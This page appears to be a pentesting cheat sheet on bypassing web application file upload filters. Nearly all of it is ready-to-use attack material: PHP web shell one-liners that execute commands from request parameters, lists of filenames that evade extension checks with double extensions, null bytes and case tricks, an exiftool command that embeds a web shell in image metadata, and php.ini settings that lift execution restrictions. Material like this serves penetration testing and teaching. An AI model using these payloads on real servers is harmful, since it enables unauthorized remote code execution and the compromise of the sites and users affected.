> For the complete documentation index, see [llms.txt](https://gitbook.seguranca-informatica.pt/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://gitbook.seguranca-informatica.pt/cheat-sheet-1/web/file-upload-bypass.md).

# File Upload bypass

## File Upload bypass

### Content

```php
GIF89a1
<?php $a=system($_GET['cmd']); echo $a;?>
<?php system('whoami'); ?>
<?php exec('whoami'); ?>
<?php passthru('whoami'); ?>
<?php shell_exec('whoami'); ?>
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>
```

### Filters

```php
evil.png;.php
evil.gif.php
evil.gif.php5
evil.php;gif
evil.config
evil.htaccess

 --other-extensions--
php3
php4
php5
php7
pht
phtm
phtml
phar
phps
```

Other extensions

```php
PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc
ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
Coldfusion: .cfm, .cfml, .cfc, .dbm
Flash: .swf
Perl: .pl, .cgi
Erlang Yaws Web Server: .yaws
```

### Bypass file extensions checks

-Try upper cases: **pHp, .pHP5, .PhAr** ...\
-Add a valid extension before the execution extension: **file.png.Php5**\
-Add special characters at the end. Use burpsuite-intruder to make it easy.

```php
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
```

-Try to bypass the protections tricking the extension parser of the server-side with techniques like **doubling the extension** o**r adding junk data** (**null byte**s) between extensions.

```php
file.png.php
file.png.pHp5
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
flile.phpJunk123png
```

### Metatag with exif tool

```php
exiftool -Comment='<?php system($_REQUEST['cmd']); ?>' test.png
```

![](/files/-MXHgfOQxDwk5lX-HvuP)

### **php.ini file to bypass restrictions**

```php
safe_mode = Off
disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF
exec = ON 
shell_exec = ON
```
